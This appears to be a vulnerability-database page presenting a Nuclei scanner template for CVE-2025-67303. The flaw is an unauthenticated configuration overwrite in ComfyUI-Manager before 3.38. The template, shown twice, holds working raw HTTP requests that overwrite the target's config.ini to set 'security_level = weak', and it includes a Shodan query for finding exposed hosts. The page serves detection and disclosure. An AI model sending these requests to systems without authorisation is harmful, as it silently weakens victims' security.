ComfyUI-Manager < 3.38 - Configuration Overwrite

CVE-2025-67303

Verified

Description

ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.

Severity

Critical

CVSS Score

9.8

Exploit Probability

Affected Product

comfyui-manager

Published Date

March 31, 2026

Template Author

maciejklimek

CVE-2025-67303.yaml

id: CVE-2025-67303

info:
  name: ComfyUI-Manager < 3.38 - Configuration Overwrite
  author: maciejklimek
  severity: critical
  description: |
    ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.
  impact: |
    Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security.
  remediation: |
    Update to version 3.38 or later.
  reference:
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
    - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-67303
    epss-score: 0.01551
    epss-percentile: 0.81648
    cwe-id: CWE-420
  metadata:
    verified: true
    max-request: 3
    vendor: comfy-org
    product: comfyui-manager
    shodan-query: http.title:"ComfyUI"
  tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln,vkev

http:
  - raw:
      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        [default]
        security_level = weak

      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_1, '[default]', 'security_level')"
          - "contains(body_3, 'security_level = weak')"
          - "status_code_1 == 200 && status_code_3 == 200"
        condition: and
# digest: 4a0a0047304502210099c2955b4f0ec0a811e32d840c78ddc537286922ce410ccbc178672f112ab7b50220256d667becee99546669d79a28f697780b06b44363cf53c09625148ab69006e7:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-67303

CWE ID:

cwe-420

References

https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md

Remediation Steps

Update to version 3.38 or later.

id: CVE-2025-67303

info:
  name: ComfyUI-Manager < 3.38 - Configuration Overwrite
  author: maciejklimek
  severity: critical
  description: |
    ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.
  impact: |
    Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security.
  remediation: |
    Update to version 3.38 or later.
  reference:
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
    - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-67303
    epss-score: 0.01551
    epss-percentile: 0.81648
    cwe-id: CWE-420
  metadata:
    verified: true
    max-request: 3
    vendor: comfy-org
    product: comfyui-manager
    shodan-query: http.title:"ComfyUI"
  tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln,vkev

http:
  - raw:
      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        [default]
        security_level = weak

      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_1, '[default]', 'security_level')"
          - "contains(body_3, 'security_level = weak')"
          - "status_code_1 == 200 && status_code_3 == 200"
        condition: and
# digest: 4a0a0047304502210099c2955b4f0ec0a811e32d840c78ddc537286922ce410ccbc178672f112ab7b50220256d667becee99546669d79a28f697780b06b44363cf53c09625148ab69006e7:922c64590222798bb761d5b6d8e72950

ComfyUI-Manager < 3.38 - Configuration Overwrite

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

ComfyUI-Manager < 3.38 - Configuration Overwrite

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps